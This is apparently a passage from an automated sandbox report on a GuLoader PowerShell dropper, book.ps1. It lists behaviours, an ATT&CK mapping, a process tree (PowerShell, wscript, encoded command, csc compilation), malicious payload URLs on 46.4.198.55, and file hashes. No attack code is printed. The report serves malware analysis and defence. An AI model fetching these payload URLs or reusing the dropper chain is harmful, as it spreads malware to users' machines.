    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
MITRE ATT&CK matrix (techniques listed per tactic column, keeping the numbers the report shows in front of matched techniques):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 11 Command and Scripting Interpreter; 111 Scripting; 2 PowerShell; At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: 11 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 111 Scripting; 1 Obfuscated Files or Information; Compile After Delivery
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 Query Registry; 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
Behavior Graph (ID: 623683; sample: book.ps1; start date: 10/05/2022; architecture: WINDOWS; score: 72)

Signatures attached to the sample: Antivirus detection for URL or domain; Yara detected GuLoader; Potential dropper URLs found in powershell memory

Process tree recovered from the graph:

• book.ps1
  • powershell.exe (started)
    • wscript.exe (started); signatures: Wscript starts Powershell (via cmd or directly); Very long command line found; Encrypted powershell cmdline option found
      • powershell.exe (started)
        • csc.exe (started); dropped file: C:\Users\user\AppData\Local\...\xtg032l3.dll, PE32
          • cvtres.exe (started)
        • conhost.exe (started)
    • powershell.exe (started); DNS/IP: 46.4.198.55, 49728, 80 HETZNER-ASDE Germany
    • conhost.exe (started)

Source | Detection | Scanner | Label
book.ps1 | 0% | ReversingLabs |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://46.4.198.55 | 100% | Avira URL Cloud | malware
http://46.4.198.55/10P/Sursdepa.vbsh | 100% | Avira URL Cloud | malware
http://46.4.198.55/10P/Sursdepa.vbs | 100% | Avira URL Cloud | malware
http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs | 100% | Avira URL Cloud | malware
http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~ | 100% | Avira URL Cloud | malware
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.microsoft.co | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$ | 100% | Avira URL Cloud | malware
http://46.4.198.55/10P/Sursdepa.vbs0yj | 100% | Avira URL Cloud | malware
http://46.4.198.55/10P/Sursdepa.v | 100% | Avira URL Cloud | malware
http://go.micros | 0% | URL Reputation | safe
http://46.4.198.55x | 0% | Avira URL Cloud | safe
    No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://46.4.198.55/10P/Sursdepa.vbs | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://46.4.198.55 | powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://46.4.198.55/10P/Sursdepa.vbsh | powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs | powershell.exe, 00000003.00000002.282555129.00000167E5B10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~ | powershell.exe, 00000003.00000002.282784282.00000167E5E50000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.microsoft.co | powershell.exe, 00000003.00000002.300436047.00000167FFC19000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281286699.00000167FFC19000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000003.00000002.298249127.00000167E8C5F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$ | powershell.exe, 00000003.00000002.301030775.00000167FFDE7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281332697.00000167FFDE2000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.318892077.00000211B6EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282944131.00000167E7731000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://46.4.198.55/10P/Sursdepa.vbs0yj | powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://46.4.198.55/10P/Sursdepa.v | powershell.exe, 00000003.00000002.292149897.00000167E848D000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://go.micros | powershell.exe, 00000001.00000002.323271463.00000211B7732000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://46.4.198.55x | powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
IP | Domain | Country | ASN | ASN Name | Malicious
46.4.198.55 | unknown | Germany | 24940 | HETZNER-ASDE | false
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 623683
Start date and time: 2022-05-10 18:43:15 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 4s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: book.ps1
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal72.troj.evad.winPS1@13/19@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 48
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .ps1
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Execution Graph export aborted for target powershell.exe, PID 3144 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6276 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6344 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: book.ps1
Time | Type | Description
18:44:38 | API Interceptor | 106x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Context
46.4.198.55
• EnricoDoc.dotm | malicious | 46.4.198.55/10P/book.ps1
• Tab2.dotm | malicious | 46.4.198.55/Tab2/book.ps1
No context
Match | Associated Sample Name / URL | Detection | Context
HETZNER-ASDE
• EnricoDoc.dotm | malicious | 46.4.198.55
• e8CkCfHRUx.exe | malicious | 136.243.172.101
• FAX Voice Caller - B.xll | malicious | 144.76.136.153
• fax - Payment - B.xll | malicious | 144.76.136.153
• Neue Bestellung.exe | malicious | 144.76.136.153
• SWIFT10.05.2022 ,pdf.exe | malicious | 88.99.36.203
• ez.apk | malicious | 94.130.163.40
• ez.apk | malicious | 94.130.163.40
• https://theknowledgeburrow.com/did-the-captain-of-the-titanic-ignore-iceberg-warnings/#:~:text=How%20many%20warnings%20did%20Titanic%20receive%20about%20icebergs,that%20a%20nearby%20vessel%20was%20stuck%20in%20ice | malicious | 78.47.72.67
• FxXd0Vefx1.exe | malicious | 144.76.120.25
• Installer.exe | malicious | 176.9.247.226
• z3hir.arm | malicious | 116.202.237.198
• RSX.exe | malicious | 195.201.253.119
• 1isequal9.mips | malicious | 5.9.114.250
• MtBDy2a3nQ.exe | malicious | 136.243.172.101
• 1isequal9.i486 | malicious | 94.130.231.156
• 1isequal9.arm | malicious | 144.79.12.250
• Factura n#U00ba 220111826N.xlsx | malicious | 5.161.106.232
• Facturan#U00ba220111826N.xlsx | malicious | 5.161.106.232
• SecuriteInfo.com.Trojan.DownLoader44.58468.21897.exe | malicious | 144.76.136.153
                  No context
                  No context
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):11606
                  Entropy (8bit):4.889221124293713
                  Encrypted:false
                  SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib4fe2Ca6pZlR:dMib4T4YLiib4fxopbjvwRjdvRTniQ0P
                  MD5:DBAF0AC6B37CA6806A1C4AF9DF83C99D
                  SHA1:68AC141D6D56D93B52C81C0F18B26A5B9755A79F
                  SHA-256:1DF55044C6D8EDFF49DA570CD306B0BE68A3D97DCEE02A5D417DB5223D3AA543
                  SHA-512:B5F0DA77EF5AEE08E55E12DAA7FA0BF631A77D4F94F17951D8ADB3D38CA81743862F90D3C232F9E75D701E2A823A4BE39BA3D1689631816D40C15E455CB38C46
                  Malicious:false
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1200
                  Entropy (8bit):5.318432830754259
                  Encrypted:false
                  SSDEEP:24:3UCPpQrLAo4KAxX5qRPD42HOoFe9t4CvKaBPnKdr+q:lPerB4nqRL/HvFe9t4CvpBfur+q
                  MD5:D7F10739CE94FBBD93A1C0724A750BDB
                  SHA1:4E5FFBF85D29084A0BD94B1E067109BFF1B527CE
                  SHA-256:5311F389A445AC225504B04B4653867DB1D811838A4118075C94409AF3B77FE1
                  SHA-512:C4BFEA1462B2EF412013956C63859F5433EB38A3F9FB1158CA375D0DD412E284519E2E489A104F8D794CF3920955870A1AD5EA65133F248434BFF972007CCAC8
                  Malicious:false
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                  Category:dropped
                  Size (bytes):1328
                  Entropy (8bit):3.9821202951451133
                  Encrypted:false
                  SSDEEP:24:HVe9EuZfW8jJXDfH4hKEbsmfII+ycuZhNmdo5akSfdoOPNnq9qd:cB3zaKPmg1ulSaa3FBq9K
                  MD5:505A72B275501CAC0414CE22B67825FA
                  SHA1:9DAFB6870CAA22AB16A3D0B6865799DC8C17BF8E
                  SHA-256:707741E78DCD26E29FACB6B79FD9B9DF25B4639BF3FF07F18BD0CA9BB233BFD0
                  SHA-512:5D7777248EB7D0DC6AB1031E71595810A8E5124FB3E12C8D59D670DAE2F604C621E8178604ACB7A6AD4849E60B24A1652D9FD043F3B503029C77E68C64C77C0A
                  Malicious:false
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
